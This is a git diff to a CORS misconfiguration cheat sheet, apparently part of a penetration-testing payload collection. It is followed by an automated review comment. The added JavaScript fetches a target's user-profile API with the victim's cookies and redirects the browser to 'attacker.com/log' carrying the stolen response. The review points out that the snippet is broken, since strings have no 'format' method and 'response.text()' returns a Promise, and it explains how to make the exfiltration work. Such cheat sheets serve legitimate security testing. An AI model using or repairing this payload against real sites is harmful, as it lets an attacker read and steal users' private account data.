diff --git a/CORS - Misconfigurations & Bypass.md b/CORS - Misconfigurations & Bypass.md index 68abf53..8206245 100644 --- a/CORS - Misconfigurations & Bypass.md +++ b/CORS - Misconfigurations & Bypass.md @@ -30,6 +30,15 @@ xhr.withCredentials = true; xhr.send(null); ``` +```javascript +fetch("https://target.com/api/user/profile", { + credentials: "include" +}) +.then((response) => { + document.location = "//attacker.com/log?key={0}".format(response.text()); +}); +``` + ```javascript fetch(url, { credentials: 'include'
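Review bot: In the added `fetch` block, the `.then` callback calls `"//attacker.com/log?key={0}".format(response.text())`, which is not valid JavaScript as documentation: strings have no `format` method, and `response.text()` returns a Promise rather than the body, so the snippet throws a TypeError as written. Resolve the body in its own step, `.then((response) => response.text())`, and build the string from the resolved text in a following `.then`. The new block also lands directly above an existing `fetch(url, { credentials: 'include'` example, so consider folding the two into one rather than keeping near-duplicates, and keep the quoting style (`"include"` vs `'include'`) consistent with the rest of the file.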